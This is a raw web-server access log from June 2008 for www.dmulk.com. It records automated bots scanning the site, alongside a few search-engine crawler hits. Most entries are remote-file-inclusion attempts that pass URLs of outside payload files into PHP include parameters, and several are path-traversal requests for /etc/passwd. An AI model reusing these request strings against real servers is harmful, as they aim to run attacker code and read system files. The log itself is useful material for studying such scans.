209.200.255.217 - - [24/Jun/2008:10:59:21 -0700] "GET /logs/access_080105.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.15.205.17 - - [24/Jun/2008:10:59:23 -0700] "GET /logs/access_080329.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://loverzpoint.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:59:27 -0700] "GET /logs/access_080105.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:10:59:31 -0700] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.57.1.181 - - [24/Jun/2008:10:59:38 -0700] "GET //modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:59:43 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:59:43 -0700] "GET /errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:10:59:44 -0700] "GET /logs/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.79.162.194 - - [24/Jun/2008:10:59:51 -0700] "GET /logs/access_080123.log//includes/functions_portal.php?phpbb_root_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:00:27 -0700] "GET /!scanhttp://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:00:27 -0700] "GET /logs/access_080425.log/!scanhttp://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:11:00:35 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:00:42 -0700] "GET /logs/!scanhttp://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:11:01:09 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:11:01:09 -0700] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:11:01:09 -0700] "GET /errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:11:01:09 -0700] "GET /logs/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:11:01:14 -0700] "GET //skin/zero_vote/error.php?dir=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:11:01:14 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:11:01:18 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:11:01:19 -0700] "GET /logs/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:11:01:19 -0700] "GET /errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:11:01:19 -0700] "GET /!scanhttp://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:11:01:19 -0700] "GET /logs/!scanhttp://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:11:01:19 -0700] "GET /logs/access_080425.log/!scanhttp://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
218.239.223.69 - - [24/Jun/2008:11:01:36 -0700] "GET /logs/access_080215.log//includes/functions_portal.php?phpbb_root_path=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.223.69 - - [24/Jun/2008:11:01:37 -0700] "GET //includes/functions_portal.php?phpbb_root_path=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.223.69 - - [24/Jun/2008:11:01:37 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:11:01:54 -0700] "GET /logs/access_080312.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
77.221.130.15 - - [24/Jun/2008:11:01:59 -0700] "GET /logs/access.log//ktmlpro/includes/ktedit/toolbar.php?http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [24/Jun/2008:11:01:59 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:11:02:18 -0700] "GET /logs/access_080312.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:02:18 -0700] "GET /logs/access_080425.log/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:02:19 -0700] "GET /errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:02:19 -0700] "GET /logs/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:11:02:24 -0700] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.57.1.181 - - [24/Jun/2008:11:02:27 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.87 - - [24/Jun/2008:11:02:46 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.58.157 - - [24/Jun/2008:11:02:46 -0700] "GET /logs/access_080312.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.73.161 - - [24/Jun/2008:11:03:09 -0700] "GET /megumi/minamigrad2k8/IMG_1598.CR2 HTTP/1.1" 200 9399634 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:11:04:00 -0700] "GET /logs/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:11:04:00 -0700] "GET /errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:11:04:05 -0700] "GET /logs/access_080425.log/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:11:04:05 -0700] "GET /logs/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:11:04:06 -0700] "GET /errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:11:04:10 -0700] "GET /logs/access_080312.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:11:04:15 -0700] "GET /logs/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.255.217 - - [24/Jun/2008:11:04:15 -0700] "GET /errors.php?error=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:11:04:18 -0700] "GET /!scanhttp://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:11:04:18 -0700] "GET /logs/access_080425.log/!scanhttp://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
209.35.191.113 - - [24/Jun/2008:11:04:18 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.113 - - [24/Jun/2008:11:04:18 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:11:04:23 -0700] "GET /logs/!scanhttp://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:04:32 -0700] "GET /logs/access_080118.log/inc/cmses/aedatingCMS.php?dir[inc]=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:04:32 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:04:33 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.35.191.113 - - [24/Jun/2008:11:05:27 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.113 - - [24/Jun/2008:11:05:27 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:07:14 -0700] "GET /logs/access.log/errors.php?error=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:07:14 -0700] "GET /errors.php?error=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:07:14 -0700] "GET /logs/errors.php?error=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.57.1.181 - - [24/Jun/2008:11:07:15 -0700] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.57.1.181 - - [24/Jun/2008:11:07:15 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:11:07:23 -0700] "GET /logs/access_080109.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.57.1.181 - - [24/Jun/2008:11:07:24 -0700] "GET /logs/access_071212.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.246.68.52 - - [24/Jun/2008:11:07:41 -0700] "GET /logs/access_080109.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.111.176.84 - - [24/Jun/2008:11:07:48 -0700] "GET /logs/access_080123.log//includes/functions_portal.php?phpbb_root_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:11:07:50 -0700] "GET /logs/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:07:59 -0700] "GET /logs/errors.php?error=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:07:59 -0700] "GET /errors.php?error=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.170.90.64 - - [24/Jun/2008:11:08:11 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 500 374 "-" "libwww-perl/5.810" "www.dmulk.com"
67.195.58.170 - - [24/Jun/2008:11:08:20 -0700] "GET /logs/access_080127.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.234.186.154 - - [24/Jun/2008:11:08:56 -0700] "GET /logs/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.186.154 - - [24/Jun/2008:11:09:17 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 500 374 "-" "libwww-perl/5.810" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:11:09:31 -0700] "GET /logs/access_080425.log/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:11:09:31 -0700] "GET /errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.234.98.104 - - [24/Jun/2008:11:09:37 -0700] "GET /logs/errors.php?error=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
61.70.204.99 - - [24/Jun/2008:11:09:54 -0700] "GET /logs//cyberfolio/portfolio/msg/view.php?av=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [24/Jun/2008:11:09:54 -0700] "GET //cyberfolio/portfolio/msg/view.php?av=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [24/Jun/2008:11:10:00 -0700] "GET /logs//cyberfolio/portfolio/msg/view.php?av=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [24/Jun/2008:11:10:01 -0700] "GET //cyberfolio/portfolio/msg/view.php?av=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:10:10 -0700] "GET /logs/access_080201.log/errors.php?error=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.65.34.76 - - [24/Jun/2008:11:10:17 -0700] "GET /logs/access.log//index.php?pag=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [24/Jun/2008:11:10:17 -0700] "GET /logs//index.php?pag=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:10:22 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:10:23 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [24/Jun/2008:11:10:23 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.75.225.10 - - [24/Jun/2008:11:10:37 -0700] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.foolishmovies.helloweb.eu/fastidio_id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.75.225.10 - - [24/Jun/2008:11:10:37 -0700] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.foolishmovies.helloweb.eu/fastidio_id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.65.34.76 - - [24/Jun/2008:11:10:38 -0700] "GET //index.php?pag=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 500 374 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.186.154 - - [24/Jun/2008:11:10:57 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 500 374 "-" "libwww-perl/5.810" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:11:10:58 -0700] "GET /logs/access_080401.log/12all/admin/cron_pop.php?adm_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:11:10:59 -0700] "GET /12all/admin/cron_pop.php?adm_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:11:10:59 -0700] "GET /logs/12all/admin/cron_pop.php?adm_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:11:11:00 -0700] "GET /logs/access_080401.log/12all/admin/cron_pop.php?adm_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:11:11:00 -0700] "GET /12all/admin/cron_pop.php?adm_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:11:11:01 -0700] "GET /logs/12all/admin/cron_pop.php?adm_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:11:11:01 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:11:11:01 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:11:11:02 -0700] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.geocities.com/siskagita/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:11:11:02 -0700] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.geocities.com/siskagita/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:11:11:12 -0700] "GET /logs/errors.php?error=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:11:11:12 -0700] "GET /errors.php?error=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:11:11:49 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:11:11:49 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:11:11:50 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:11:11:55 -0700] "GET /logs/access_080212.log/skins/advanced/advanced1.php?pluginpath[0]=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.57.1.181 - - [24/Jun/2008:11:12:21 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.57.1.181 - - [24/Jun/2008:11:12:22 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:11:12:45 -0700] "GET /logs/access_080121.log/send_reminders.php?includedir=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:11:12:46 -0700] "GET /send_reminders.php?includedir=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:11:12:46 -0700] "GET /logs/send_reminders.php?includedir=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:11:12:59 -0700] "GET /logs/access_080201.log/send_reminders.php?includedir=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [24/Jun/2008:11:13:33 -0700] "GET /logs/access_071225.log//index.php?pag=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.142.80.108 - - [24/Jun/2008:11:13:52 -0700] "GET /logs/access.log/errors.php?error=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.142.80.108 - - [24/Jun/2008:11:13:53 -0700] "GET /errors.php?error=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.142.80.108 - - [24/Jun/2008:11:13:54 -0700] "GET /logs/errors.php?error=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:11:14:02 -0700] "GET /logs/access_080329.log/12all/admin/cron_pop.php?adm_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
